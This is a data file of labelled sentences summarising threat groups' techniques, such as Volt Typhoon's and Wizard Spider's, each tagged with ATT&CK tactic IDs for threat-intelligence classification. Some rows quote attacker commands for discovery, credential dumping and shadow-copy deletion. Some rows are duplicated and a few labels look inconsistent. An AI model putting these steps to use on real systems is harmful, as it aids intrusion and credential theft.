Volt Typhoon has used compromised domain accounts to authenticate to devices on compromised networks.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Volt Typhoon has run `net group` in compromised environments to discover domain groups.,['TA0007:Discovery']
Volt Typhoon has targeted the personal emails of key network and IT staff at victim organizations.,['TA0043:Reconnaissance']
"Volt Typhoon has gained initial access through exploitation of multiple vulnerabilities in internet-facing software and appliances such as Fortinet, Ivanti , NETGEAR, Citrix, and Cisco.",['TA0001:Initial Access']
Volt Typhoon has gained initial access by exploiting privilege escalation vulnerabilities in the operating system or network services.,['TA0004:Privilege Escalation']
Volt Typhoon has exploited zero-day vulnerabilities for initial access.,['TA0042:Resource Development']
Volt Typhoon has used VPNs to connect to victim environments and enable post-exploitation actions.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Volt Typhoon has run `rd /S` to delete their working directories and deleted systeminfo.dat from `C:\Users\Public\Documentsfiles`.,['TA0005:Defense Evasion']
Volt Typhoon has enumerated directories containing vulnerability testing and cyber related content and facilities data such as construction drawings.,['TA0007:Discovery']
Volt Typhoon has conducted pre-compromise reconnaissance for victim host information.,['TA0043:Reconnaissance']
Volt Typhoon has gathered victim identify information during pre-compromise reconnaissance.,['TA0043:Reconnaissance']
Volt Typhoon has conducted extensive pre-compromise reconnaissance to learn about the target organization’s network.,['TA0043:Reconnaissance']
Volt Typhoon has conducted extensive reconnaissance pre-compromise to gain information about the targeted organization.,['TA0043:Reconnaissance']
Volt Typhoon has identified key network and IT staff members pre-compromise at targeted organizations.,['TA0043:Reconnaissance']
Volt Typhoon has downloaded an outdated version of comsvcs.dll to a compromised domain controller in a non-standard folder.,['TA0011:Command and Control']
Volt Typhoon has used the built-in netsh `port proxy` command to create proxies on compromised systems to facilitate access.,['TA0011:Command and Control']
Volt Typhoon has employed Ping to check network connectivity.,['TA0007:Discovery']
Volt Typhoon has created and accessed a file named rult3uil.log on compromised domain controllers to capture keypresses and command execution.,"['TA0009:Collection', 'TA0006:Credential Access']"
Volt Typhoon has attempted to access hashed credentials from the LSASS process memory space.,['TA0006:Credential Access']
Volt Typhoon has copied web shells between servers in targeted environments.,['TA0008:Lateral Movement']
Volt Typhoon has executed `net user` and `quser` to enumerate local account information.,['TA0007:Discovery']
Volt Typhoon has saved stolen files including the `ntds.dit` database and the `SYSTEM` and `SECURITY` Registry hives locally to the `C:\Windows\Temp\` directory.,['TA0009:Collection']
Volt Typhoon has run `net localgroup administrators` in compromised environments to enumerate accounts.,['TA0007:Discovery']
Volt Typhoon has used `wevtutil.exe` and the PowerShell command `Get-EventLog security` to enumerate Windows logs to search for successful logons.,['TA0007:Discovery']
Volt Typhoon has appended copies of the ntds.dit database with a .gif file extension.,['TA0005:Defense Evasion']
"Volt Typhoon has used legitimate looking filenames for compressed copies of the ntds.dit database and used names including cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe for the Earthworm and Fast Reverse Proxy tools.",['TA0005:Defense Evasion']
Volt Typhoon has used `netsh` to create a PortProxy Registry modification on a compromised server running the Paessler Router Traffic Grapher .,['TA0005:Defense Evasion']
Volt Typhoon has used multi-hop proxies for command-and-control infrastructure.,['TA0011:Command and Control']
Volt Typhoon has used ntds.util to create domain controller installation media containing usernames and password hashes.,['TA0006:Credential Access']
"Volt Typhoon has compromised small office and home office network edge devices, many of which were located in the same geographic area as the victim, to proxy network traffic.",['TA0042:Resource Development']
Volt Typhoon has identified target network security measures as part of pre-compromise reconnaissance.,['TA0043:Reconnaissance']
"Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for network service discovery.",['TA0007:Discovery']
Volt Typhoon has conducted extensive reconnaissance of victim networks including identifying network topologies.,['TA0043:Reconnaissance']
Volt Typhoon has obtained victim's screen dimension and display device information.,['TA0007:Discovery']
"Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for group and user discovery.",['TA0007:Discovery']
Volt Typhoon has used PowerShell including for remote system discovery.,['TA0002:Execution']
Volt Typhoon has accessed a Local State file that contains the AES key used to encrypt passwords stored in the Chrome browser.,['TA0006:Credential Access']
Volt Typhoon has enumerated running processes on targeted systems including through the use of Tasklist.,['TA0007:Discovery']
"Volt Typhoon has used compromised devices and customized versions of open source tools such as FRP , Earthworm, and Impacket to proxy network traffic.",['TA0011:Command and Control']
"Volt Typhoon has queried the Registry on compromised systems, `reg query hklm\software\`, for information on installed software including PuTTY.",['TA0007:Discovery']
Volt Typhoon has moved laterally to the Domain Controller via RDP using a compromised account with domain administrator privileges.,['TA0008:Lateral Movement']
"Volt Typhoon has used multiple methods, including Ping, to enumerate systems on compromised networks.",['TA0007:Discovery']
"Volt Typhoon has used FOFA, Shodan, and Censys to search for exposed victim infrastructure.",['TA0043:Reconnaissance']
Volt Typhoon has obtained a screenshot of the victim's system using the gdi32.dll and gdiplus.dll libraries.,['TA0009:Collection']
Volt Typhoon has conducted pre-compromise web searches for victim information.,['TA0043:Reconnaissance']
Volt Typhoon has conducted pre-compromise reconnaissance on victim-owned sites.,['TA0043:Reconnaissance']
Volt Typhoon has used compromised Paessler Router Traffic Grapher servers from other organizations for C2.,['TA0042:Resource Development']
Volt Typhoon has queried the Registry on compromised systems for information on installed software.,['TA0007:Discovery']
Volt Typhoon has used the Ultimate Packer for Executables to obfuscate the FRP client files BrightmetricAgent.exe and SMSvcService.ex) and the port scanning utility ScanLine.,['TA0005:Defense Evasion']
Volt Typhoon has used a version of the Awen web shell that employed AES encryption and decryption for C2 communications.,['TA0011:Command and Control']
"Volt Typhoon has used native tools and processes including living off the land binaries or “LOLBins"" to maintain and expand access to the victim networks.",['TA0005:Defense Evasion']
Volt Typhoon has run system checks to determine if they were operating in a virtualized environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Volt Typhoon has discovered file system types, drive names, size, and free space on compromised systems.",['TA0007:Discovery']
Volt Typhoon has obtained the victim's system current location.,['TA0007:Discovery']
"Volt Typhoon has executed multiple commands to enumerate network topology and settings including `ipconfig`, `netsh interface firewall show all`, and `netsh interface portproxy show all`.",['TA0007:Discovery']
Volt Typhoon has used `netstat -ano` on compromised hosts to enumerate network connections.,['TA0007:Discovery']
Volt Typhoon has used public tools and executed the PowerShell command `Get-EventLog security -instanceid 4624` to identify associated user and computer account names.,['TA0007:Discovery']
Volt Typhoon has used `net start` to list running services.,['TA0007:Discovery']
Volt Typhoon has obtained the victim's system timezone.,['TA0007:Discovery']
Volt Typhoon has used legitimate network and forensic tools and customized versions of open-source tools for C2.,['TA0042:Resource Development']
Volt Typhoon has used Brightmetricagent.exe which contains a command- line interface library that can leverage command shells including Z Shell .,['TA0002:Execution']
Volt Typhoon has obtained credentials insecurely stored on targeted network appliances.,['TA0006:Credential Access']
Volt Typhoon relies primarily on valid credentials for persistence.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Volt Typhoon has compromised Virtual Private Servers to proxy C2 traffic.,['TA0042:Resource Development']
Volt Typhoon has used publicly available exploit code for initial access.,['TA0042:Resource Development']
"Volt Typhoon has used webshells, including ones named AuditReport.jspx and iisstart.aspx, in compromised environments.",['TA0003:Persistence']
Volt Typhoon has used the Windows command line to perform hands-on-keyboard activities in targeted environments including for discovery.,['TA0002:Execution']
"Volt Typhoon has leveraged WMIC for execution, remote system discovery, and to create and use temporary directories.",['TA0002:Execution']
WIRTE has used Base64 to decode malicious VBS script.,['TA0005:Defense Evasion']
WIRTE has downloaded PowerShell code from the C2 server to be executed.,['TA0011:Command and Control']
WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.,['TA0002:Execution']
WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.,['TA0005:Defense Evasion']
WIRTE has used HTTPS over ports 2083 and 2087 for C2.,['TA0011:Command and Control']
WIRTE has used PowerShell for script execution.,['TA0002:Execution']
WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script.,['TA0005:Defense Evasion']
WIRTE has sent emails to intended victims with malicious MS Word and Excel attachments.,['TA0001:Initial Access']
WIRTE has obtained and used Empire for post-exploitation activities.,['TA0042:Resource Development']
WIRTE has used VBScript in its operations.,['TA0002:Execution']
WIRTE has used HTTP for network communication.,['TA0011:Command and Control']
Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands.,['TA0002:Execution']
Whitefly has used search order hijacking to run the loader Vcrodat.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Whitefly has encrypted the payload used for C2.,['TA0005:Defense Evasion']
Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability on unpatched computers.,['TA0004:Privilege Escalation']
Whitefly has the ability to download additional tools from the C2.,['TA0011:Command and Control']
Whitefly has used Mimikatz to obtain credentials.,['TA0006:Credential Access']
Whitefly has used malicious .exe or .dll files disguised as documents or images.,['TA0002:Execution']
Whitefly has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.,['TA0005:Defense Evasion']
Whitefly has obtained and used tools such as Mimikatz.,['TA0042:Resource Development']
Windigo has used a Perl script for information gathering.,['TA0002:Execution']
Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors.,['TA0009:Collection']
Windigo has distributed Windows malware via drive-by downloads.,['TA0001:Initial Access']
Windigo has used a script to check for the presence of files created by OpenSSH backdoors.,['TA0007:Discovery']
Windigo has delivered a generic Windows proxy Win32/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.,['TA0011:Command and Control']
Windigo has used a script to detect installed software on targeted systems.,['TA0007:Discovery']
Windigo has used a script to detect which Linux distribution and version is currently installed on the system.,['TA0007:Discovery']
Windshift has used compromised websites to register custom URL schemes on a remote system.,['TA0001:Initial Access']
Windshift has used tools to deploy additional payloads to compromised hosts.,['TA0011:Command and Control']
Windshift has used revoked certificates to sign malware.,['TA0005:Defense Evasion']
Windshift has used e-mail attachments to lure victims into executing malicious code.,['TA0002:Execution']
Windshift has used links embedded in e-mails to lure victims into executing malicious code.,['TA0002:Execution']
"Windshift has used icons mimicking MS Office files to mask malicious executables. Windshift has also attempted to hide executables by changing the file extension to "".scr"" to mimic Windows screensavers.",['TA0005:Defense Evasion']
Windshift has used string encoding with floating point calculations.,['TA0005:Defense Evasion']
Windshift has used malware to enumerate active processes.,['TA0007:Discovery']
Windshift has created LNK files in the Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools.,['TA0007:Discovery']
Windshift has used malware to identify installed software.,['TA0007:Discovery']
Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.,['TA0001:Initial Access']
Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.,['TA0001:Initial Access']
Windshift has used fake personas on social media to engage and target victims.,['TA0001:Initial Access']
Windshift has used malware to identify the computer name of a compromised host.,['TA0007:Discovery']
Windshift has used malware to identify the username on a compromised host.,['TA0007:Discovery']
Windshift has used Visual Basic 6 payloads.,['TA0002:Execution']
Windshift has used tools that communicate with C2 over HTTP.,['TA0011:Command and Control']
Windshift has used WMI to collect information about target machines.,['TA0002:Execution']
Winnti Group used stolen certificates to sign its malware.,['TA0005:Defense Evasion']
Winnti Group has registered domains for C2 that mimicked sites of their intended targets.,['TA0042:Resource Development']
Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts.,['TA0007:Discovery']
Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.,['TA0011:Command and Control']
Winnti Group looked for a specific process running on infected servers.,['TA0007:Discovery']
Winnti Group used a rootkit to modify typical server functionality.,['TA0005:Defense Evasion']
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.,['TA0009:Collection']
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.,['TA0010:Exfiltration']
Winter Vivern used XLM 4.0 macros for initial code execution for malicious document files.,['TA0002:Execution']
Winter Vivern delivered exploit payloads via base64-encoded payloads in malicious email messages.,['TA0005:Defense Evasion']
Winter Vivern registered domains mimicking other entities throughout various campaigns.,['TA0042:Resource Development']
Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious fake anti-virus software.,['TA0001:Initial Access']
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.,['TA0010:Exfiltration']
"Winter Vivern has exploited known and zero-day vulnerabilities in software usch as Roundcube Webmail servers and the ""Follina"" vulnerability.",['TA0001:Initial Access']
Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails in exploited email servers.,['TA0007:Discovery']
Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads.,['TA0011:Command and Control']
Winter Vivern delivered malicious JavaScript to exploit targets when exploiting Roundcube Webmail servers.,['TA0002:Execution']
Winter Vivern delivered malicious JavaScript payloads capable of exfiltrating email messages from exploited email servers.,['TA0009:Collection']
Winter Vivern has mimicked legitimate government-related domains to deliver malicious webpages containing links to documents or other content for user execution.,['TA0002:Execution']
Winter Vivern has distributed malicious scripts and executables mimicking virus scanners.,['TA0005:Defense Evasion']
Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns.,['TA0005:Defense Evasion']
Winter Vivern passed execution from document macros to PowerShell scripts during initial access operations. Winter Vivern used batch scripts that called PowerShell commands as part of initial access and installation operations.,['TA0002:Execution']
Winter Vivern executed PowerShell scripts that would subsequently attempt to establish persistence by creating scheduled tasks objects to periodically retrieve and execute remotely-hosted payloads.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines.,['TA0009:Collection']
Winter Vivern leverages malicious attachments delivered via email for initial access activity.,['TA0001:Initial Access']
Winter Vivern script execution includes basic victim information gathering steps which are then transmitted to command and control servers.,['TA0007:Discovery']
Winter Vivern PowerShell scripts execute `whoami` to identify the executing user.,['TA0007:Discovery']
Winter Vivern used adversary-owned and -controlled servers to host web vulnerability scanning applications.,['TA0042:Resource Development']
Winter Vivern has used remotely-hosted instances of the Acunetix vulnerability scanner.,['TA0043:Reconnaissance']
Winter Vivern registered and hosted domains to allow for creation of web pages mimicking legitimate government email logon sites to collect logon information.,"['TA0009:Collection', 'TA0006:Credential Access']"
Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.,['TA0011:Command and Control']
Winter Vivern has used compromised WordPress sites to host malicious payloads for download.,['TA0042:Resource Development']
Winter Vivern distributed Windows batch scripts disguised as virus scanners to prompt download of malicious payloads using built-in system tools.,['TA0002:Execution']
Wizard Spider has archived data into ZIP files on compromised machines.,['TA0009:Collection']
Wizard Spider has used batch scripts that utilizes WMIC to execute a BITSAdmin transfer of a ransomware payload to each compromised machine.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Wizard Spider has used Digicert code-signing certificates for some of its malware.,['TA0005:Defense Evasion']
"Wizard Spider has obtained code signing certificates signed by DigiCert, GlobalSign, and COMOOD for malware payloads.",['TA0042:Resource Development']
Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.,['TA0005:Defense Evasion']
"Wizard Spider has collected and staged credentials and network enumeration information, using the networkdll and psfin TrickBot modules.",['TA0009:Collection']
Wizard Spider has collected data from a compromised host prior to exfiltration.,['TA0009:Collection']
Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.,['TA0005:Defense Evasion']
"Wizard Spider has identified domain admins through the use of `net group ""Domain admins"" /DOMAIN`. Wizard Spider has also leveraged the PowerShell cmdlet `Get-ADComputer` to collect account names from Active Directory data.",['TA0007:Discovery']
Wizard Spider has created and used new accounts within a victim's Active Directory environment to maintain persistence.,['TA0003:Persistence']
"Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Wizard Spider has leveraged ProtonMail email addresses in ransom notes when delivering Ryuk ransomware.,['TA0042:Resource Development']
Wizard Spider has exfiltrated domain credentials and network enumeration information over command and control channels.,['TA0010:Exfiltration']
Wizard Spider has exfiltrated victim information using FTP.,['TA0010:Exfiltration']
Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.,['TA0010:Exfiltration']
Wizard Spider has exploited or attempted to exploit Zerologon and EternalBlue vulnerabilities.,['TA0008:Lateral Movement']
Wizard Spider has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.,['TA0005:Defense Evasion']
Wizard Spider has used PowerShell cmdlets `Get-GPPPassword` and `Find-GPOPassword` to find unsecured credentials in a compromised network group policy.,['TA0006:Credential Access']
Wizard Spider can transfer malicious payloads such as ransomware to compromised machines.,['TA0011:Command and Control']
Wizard Spider has used WMIC and vssadmin to manually delete volume shadow copies. Wizard Spider has also used Conti ransomware to delete volume shadow copies automatically with the use of vssadmin.,['TA0040:Impact']
"Wizard Spider has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.",['TA0006:Credential Access']
"Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.","['TA0009:Collection', 'TA0006:Credential Access']"
Wizard Spider has dumped the lsass.exe memory to harvest credentials with the use of open-source tool LaZagne.,['TA0006:Credential Access']
Wizard Spider has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.,['TA0008:Lateral Movement']
Wizard Spider has created local administrator accounts to maintain persistence in compromised networks.,['TA0003:Persistence']
"Wizard Spider has staged ZIP files in local directories such as, `C:\PerfLogs\1\` and `C:\User\1\` prior to exfiltration.",['TA0009:Collection']
"Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar.",['TA0002:Execution']
Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.,['TA0002:Execution']
"Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries.",['TA0005:Defense Evasion']
Wizard Spider has modified the Registry key HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory. Wizard Spider has also modified the WDigest registry key to allow plaintext credentials to be cached in memory.,['TA0005:Defense Evasion']
"Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database. Wizard Spider has also created a volume shadow copy and used a batch script file to collect NTDS.dit with the use of the Windows utility, ntdsutil.",['TA0006:Credential Access']
Wizard Spider has used the “net view” command to locate mapped network shares.,['TA0007:Discovery']
Wizard Spider has used the `Invoke-SMBExec` PowerShell cmdlet to execute the pass-the-hash technique and utilized stolen password hashes to move laterally.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network.,['TA0002:Execution']
Wizard Spider has used process injection to execute payloads to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Wizard Spider has established persistence via the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and a shortcut within the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wizard Spider has used RDP for lateral movement and to deploy ransomware interactively.,['TA0008:Lateral Movement']
Wizard Spider has used the WebDAV protocol to execute Ryuk payloads hosted on network file shares.,['TA0008:Lateral Movement']
"Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind, nltest/dclist, and PowerShell script Get-DataInfo.ps1 to enumerate domain computers, including the domain controller.",['TA0007:Discovery']
Wizard Spider has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.,['TA0005:Defense Evasion']
Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.,['TA0008:Lateral Movement']
Wizard Spider has used scheduled tasks to establish persistence for TrickBot and other malware.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wizard Spider has acquired credentials from the SAM/SECURITY registry hives.,['TA0006:Credential Access']
Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine.,['TA0007:Discovery']
Wizard Spider has used `services.exe` to execute scripts and executables during lateral movement within a victim's network. Wizard Spider has also used batch scripts that leverage PsExec to execute a previously transferred ransomware payload on a victim's network.,['TA0002:Execution']
"Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.",['TA0040:Impact']
Wizard Spider has utilized the PowerShell script `Get-DataInfo.ps1` to collect installed backup software information from a compromised machine.,['TA0007:Discovery']
"Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.",['TA0001:Initial Access']
Wizard Spider has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.,['TA0001:Initial Access']
"Wizard Spider has used Systeminfo and similar commands to acquire detailed configuration information of a victim's machine. Wizard Spider has also utilized the PowerShell cmdlet `Get-ADComputer` to collect DNS hostnames, last logon dates, and operating system information from Active Directory.",['TA0007:Discovery']
Wizard Spider has used ipconfig to identify the network configuration of a victim machine. Wizard Spider has also used the PowerShell cmdlet `Get-ADComputer` to collect IP address data from Active Directory.,['TA0007:Discovery']
"Wizard Spider has used ""whoami"" to identify the local user and their privileges.",['TA0007:Discovery']
"Wizard Spider has utilized tools such as Empire, Cobalt Strike, Cobalt Strike, Rubeus, AdFind, BloodHound, Metasploit, Advanced IP Scanner, Nirsoft PingInfoView, and SoftPerfect Network Scanner for targeting efforts.",['TA0042:Resource Development']
Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wizard Spider has used HTTP for network communications.,['TA0011:Command and Control']
Wizard Spider has used `cmd.exe` to execute commands on a victim's machine.,['TA0002:Execution']
Wizard Spider has used PowerShell cmdlet `Invoke-WCMDump` to enumerate Windows credentials in the Credential Manager in a compromised network.,['TA0006:Credential Access']
"Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.",['TA0005:Defense Evasion']
Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally. Wizard Spider has also used batch scripts to leverage WMIC to deploy ransomware.,['TA0002:Execution']
Wizard Spider has used Window Remote Management to move laterally through a victim network.,['TA0008:Lateral Movement']
Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.,['TA0011:Command and Control']
ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.,['TA0006:Credential Access']
ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.,['TA0005:Defense Evasion']
ZIRCONIUM has purchased domains for use in targeted campaigns.,['TA0042:Resource Development']
ZIRCONIUM has exfiltrated files via the Dropbox API C2.,['TA0010:Exfiltration']
ZIRCONIUM has exfiltrated stolen data to Dropbox.,['TA0010:Exfiltration']
ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.,['TA0004:Privilege Escalation']
ZIRCONIUM has used tools to download malicious files to compromised hosts.,['TA0011:Command and Control']
ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.,['TA0002:Execution']
ZIRCONIUM has created a run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary.,['TA0005:Defense Evasion']
ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.,['TA0005:Defense Evasion']
ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.,['TA0005:Defense Evasion']
"ZIRCONIUM has utilized an ORB network – consisting compromised devices such as small office and home office routers, IoT devices, and leased virtual private servers – to proxy traffic.",['TA0011:Command and Control']
ZIRCONIUM has compromised network devices such as small office and home office routers and IoT devices for ORB Proxy networks.,['TA0042:Resource Development']
ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.,['TA0043:Reconnaissance']
ZIRCONIUM has used Python-based implants to interact with compromised hosts.,['TA0002:Execution']
ZIRCONIUM has used a tool to query the Registry for proxy settings.,['TA0007:Discovery']
ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ZIRCONIUM has used multi-stage packers for exploit code.,['TA0005:Defense Evasion']
ZIRCONIUM has used malicious links in e-mails to deliver malware.,['TA0001:Initial Access']
ZIRCONIUM has used web beacons in e-mails to track hits to attacker-controlled URL's.,['TA0043:Reconnaissance']
ZIRCONIUM has used AES encrypted communications in C2.,['TA0011:Command and Control']
ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.,['TA0007:Discovery']
ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.,['TA0007:Discovery']
ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.,['TA0007:Discovery']
ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.,['TA0007:Discovery']
ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.,['TA0042:Resource Development']
ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.,['TA0002:Execution']
"admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.",['TA0002:Execution']
"admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: dir c:\ >> %temp%\download dir ""c:\Documents and Settings"" >> %temp%\download dir ""c:\Program Files\"" >> %temp%\download dir d:\ >> %temp%\download",['TA0007:Discovery']
admin@338 actors used the following commands following exploitation of a machine with LOWBALL malware to enumerate user accounts: net user >> %temp%\download net user /domain >> %temp%\download,['TA0007:Discovery']
admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: net localgroup administrator >> %temp%\download,['TA0007:Discovery']
admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.,['TA0002:Execution']
"admin@338 actors used the following command to rename one of their tools to a benign file name: ren ""%temp%\upload"" audiodg.exe",['TA0005:Defense Evasion']
admin@338 has sent emails with malicious Microsoft Office documents attached.,['TA0001:Initial Access']
admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: ver >> %temp%\download systeminfo >> %temp%\download,['TA0007:Discovery']
admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: ipconfig /all >> %temp%\download,['TA0007:Discovery']
admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: netstat -ano >> %temp%\download,['TA0007:Discovery']
admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: net start >> %temp%\download,['TA0007:Discovery']
"Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.",['TA0002:Execution']
menuPass has encrypted files and information before exfiltration.,['TA0009:Collection']
menuPass has compressed files before exfiltration using TAR and RAR.,['TA0009:Collection']
menuPass has used the Csvde tool to collect Active Directory files and data.,['TA0009:Collection']
menuPass has used Wevtutil to remove PowerShell execution logs.,['TA0005:Defense Evasion']
menuPass has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.,['TA0005:Defense Evasion']
menuPass has used DLL search order hijacking.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
menuPass has collected various files from the compromised computers.,['TA0009:Collection']
menuPass has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.,['TA0009:Collection']
menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used certutil -decode to decode files on the victim’s machine when dropping UPPERCUT.,['TA0005:Defense Evasion']
menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.,['TA0007:Discovery']
menuPass has registered malicious domains for use in intrusion campaigns.,['TA0042:Resource Development']
"menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.",['TA0005:Defense Evasion']
menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.,['TA0001:Initial Access']
menuPass has used tools to exploit the ZeroLogon vulnerability .,['TA0008:Lateral Movement']
menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.,['TA0011:Command and Control']
menuPass has used dynamic DNS service providers to host malicious domains.,['TA0011:Command and Control']
A menuPass macro deletes files after it has decoded and decompressed them.,['TA0005:Defense Evasion']
"menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.",['TA0007:Discovery']
menuPass has installed updates and new malware on victims.,['TA0011:Command and Control']
menuPass has used InstallUtil.exe to execute malicious software.,['TA0005:Defense Evasion']
menuPass has used key loggers to steal usernames and passwords.,"['TA0009:Collection', 'TA0006:Credential Access']"
menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.,['TA0006:Credential Access']
"menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.",['TA0009:Collection']
